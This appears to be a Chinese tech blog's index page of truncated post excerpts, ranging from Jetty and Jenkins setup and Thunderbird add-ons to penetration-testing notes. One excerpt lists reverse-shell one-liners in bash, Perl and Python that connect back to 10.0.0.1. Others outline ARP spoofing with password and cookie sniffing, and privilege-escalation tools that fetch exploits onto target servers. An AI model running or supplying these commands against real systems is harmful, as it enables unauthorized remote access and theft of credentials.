注:集成多web系统环境后续还会添加 一.linux下安装jetty: 先下载jetty 压缩包 删除demo-base目录(自带的测试项目) 1.把文件放到/opt/jetty目录 2.用命令启动jetty服务器:java -jar start.jar 3.访问localhost:8080查看是否启动成功。 ——————————————————————————————- 二.部署jenkins war包 1.将jenkins war […]
Author: 系统自定义
wooyun漏洞库和drops文章库linux下安装使用说明
wooyun漏洞库和drops文章库linux下安装使用说明: 1.首先安装python组件: 在命令行执行括号中对应的命令: flask (pip install Flask) pymongo (pip install pymongo) 2.安装mongodb服务端 在命令行执行:sudo apt-get install mongodb-server 安装完成后,用命令查看端口是否在启用:sudo nestat -lnput | grep 27017 mongodb常用命令: 重启/停止/启用/服务:sudo service mongodb restart/stop/start 3.备份或还原mongodb数据库: mongodb数据库备份: 注:不知道mongodump 文件在哪?可以通过命令whereis -b mongodump 或者 locate mongodump,linux默 […]
Linux下多种反弹shell方法
bash命令:bash -i >& /dev/tcp/10.0.0.1/8080 0>&1 perl版本:perl -e ‘use Socket;$i=”10.0.0.1″;$p=1234;socket(S,PF_INET,SOCK_STREAM,getprotobyname(“tcp”));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,”>&S”);open(STDOUT,”>&S”);open(STDERR,”>&S”);exec(“/bin/sh -i”);}; python版本:python -c ‘import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STRE […]
ThunderBird必备插件
1、Thunderbird Conversations 必装型插件。可以将同组邮件按照Gmail的样式进行整理,对层级关系也进行了更好的处理,毫不夸张的说装上这个插件,Thunderbird是瞬间就变得高大上了。 2、Manually Sort Folders 强迫症患者必备,尤其是对于新建了多个自定义文件夹的人而言,可以自主的调整文件夹的上下位置是多么必备的功能啊。 3、Color Folders 可以对文件夹的增加颜色分类,便于将不同类型的文件夹一目了然的快速分开,小功能大用途。 4、Extra Folder Columns 对文件夹面板增加更多的属性展示,包括总量和未读,这样每个文件夹的情况就展现更加清晰了。 5、Hide Local Folders 对我这种一向只用IMAP协议的邮箱使用者而言,本地文件夹基本上用不上,因此强迫症是一定要把它隐藏掉的。 6、LookOut 还记得收到 […]
python 实现输出刷新
woobuntu下内网渗透arp欺骗、监听、常用工具
0x00: 使用工具:fping 安装命令~$sudo apt-get install fping命令行执行:fping –asg xxx.xxx.xxx.xxx/24查看网关命令:netstat -rn/*用来检测内网存活主机*/ 0x01: 这里arpspoof 和ettercap随便选之一使用即可(arpspoof系统已自带)arpspoof -i 网卡名称 -t 路由网关ip 目标ip注:在arpspoof开启arp欺骗的同时,可以使用dsniff(系统自带)来监听嗅探密码woobuntu下使用命令行:sudo dsniff -c -f /usr/share/dsniff/dsniff.services 来开启dsniff的密码嗅探然后为了方便查看,可以使用cookie cadger 来会话劫持,抓取cookie。 0x02: 使用工具:ettercap安装命令 ~$sudo a […]
本地提权工具箱
0x01 背景 在我们平时渗透的过程中经常会遇到需要提权的情况,本文将介绍一些方便大家在Windows和Linux进行提权的工具。 0x02 本地提权之Windows 本工具适合在任何Windows服务器上进行已知提权漏洞的检测以及相应的提权EXP下载。 工具地址:https://github.com/brianwrf/WinSystemHelper 使用方法: 1. 拷贝WinSysHelper.bat, explt2003.txt和expgt2003.txt文件至目标Windows服务器上 2. 命令行下运行WinSysHelper.bat执行检测 3. 按照提示下载EXP进行提权 0x03 本地提权之Linux 本工具适合在任何Linux服务器上进行已知提权漏洞的检测以及相应的提权EXP下载。 工具地址: https://github.com/brianwrf/RootHelper […]